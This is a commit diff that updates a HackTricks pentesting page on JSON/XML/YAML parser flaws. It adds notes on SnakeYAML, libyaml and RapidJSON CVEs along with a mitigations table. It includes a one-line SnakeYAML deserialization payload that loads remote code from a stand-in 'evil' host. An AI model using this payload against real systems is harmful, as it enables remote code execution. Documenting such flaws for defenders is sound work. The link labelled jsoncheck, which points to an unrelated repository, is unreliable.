Merge pull request #1224 from HackTricks-wiki/research_update_src_pentesting-web_json-xml-yaml-hacking_20250801_015159

carlospolop · web-flow · commit ac8f184bff19 · 2025-08-04T22:01:55.000+02:00
Research Update Enhanced src/pentesting-web/json-xml-yaml-ha...
diff --git a/src/pentesting-web/json-xml-yaml-hacking.md b/src/pentesting-web/json-xml-yaml-hacking.md
@@ -128,16 +128,53 @@ Result:
 - **YAML** parser: `Action_1` (case-sensitive)
 - **XML** parser: parses `"Action_3"` inside the string
 
+---
 
-### 🔐 Mitigations
+## Notable Parser Vulnerabilities (2023-2025)
 
-| Risk                        | Fix                                  |
-|-----------------------------|---------------------------------------|
-| Unknown fields             | `decoder.DisallowUnknownFields()`     |
-| Duplicate fields (JSON)    | ❌ No fix in stdlib                    |
-| Case-insensitive match     | ❌ No fix in stdlib                    |
-| XML garbage data           | ❌ No fix in stdlib                    |
-| YAML: unknown keys         | `yaml.KnownFields(true)`              |
+> The following publicly-exploitable issues show that insecure parsing is a multi-language problem — not just a Go problem.
 
+### SnakeYAML Deserialization RCE (CVE-2022-1471)
+
+* Affects: `org.yaml:snakeyaml` < **2.0** (used by Spring-Boot, Jenkins, etc.).
+* Root cause: `new Constructor()` deserializes **arbitrary Java classes**, allowing gadget chains that culminate in remote-code execution.
+* One-liner PoC (will open the calculator on vulnerable host):
+```yaml
+!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]
+```
+* Fix / Mitigation:
+  1. **Upgrade to ≥2.0** (uses `SafeLoader` by default).
+  2. On older versions, explicitly use `new Yaml(new SafeConstructor())`. 
+
+### libyaml Double-Free (CVE-2024-35325)
+
+* Affects: `libyaml` ≤0.2.5 (C library leveraged by many language bindings).
+* Issue: Calling `yaml_event_delete()` twice leads to a double-free that attackers can turn into DoS or, in some scenarios, heap exploitation.
+* Status: Upstream rejected as “API misuse”, but Linux distributions shipped patched **0.2.6** that null-frees the pointer defensively. 
+
+### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684)
+
+* Affects: Tencent **RapidJSON** before commit `8269bc2` (<1.1.0-patch-22).
+* Bug: In `GenericReader::ParseNumber()` unchecked arithmetic lets attackers craft huge numeric literals that wrap around and corrupt the heap — ultimately enabling privilege-escalation when the resulting object graph is used for authorization decisions. 
+
+---
+
+### 🔐 Mitigations (Updated)
+
+| Risk                                | Fix / Recommendation                                      |
+|-------------------------------------|------------------------------------------------------------|
+| Unknown fields (JSON)               | `decoder.DisallowUnknownFields()`                          |
+| Duplicate fields (JSON)             | ❌ No fix in stdlib — validate with [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) |
+| Case-insensitive match (Go)         | ❌ No fix — validate struct tags + pre-canonicalize input   |
+| XML garbage data / XXE              | Use a hardened parser (`encoding/xml` + `DisallowDTD`)     |
+| YAML unknown keys                   | `yaml.KnownFields(true)`                                   |
+| **Unsafe YAML deserialization**     | Use SafeConstructor / upgrade to SnakeYAML ≥2.0            |
+| libyaml ≤0.2.5 double-free          | Upgrade to **0.2.6** or distro-patched release            |
+| RapidJSON <patched commit           | Compile against latest RapidJSON (≥July 2024)              |
+
+## References
+
+- Baeldung – “Resolving CVE-2022-1471 With SnakeYAML 2.0” 
+- Ubuntu Security Tracker – CVE-2024-35325 (libyaml) 
 
 {{#include ../banners/hacktricks-training.md}}
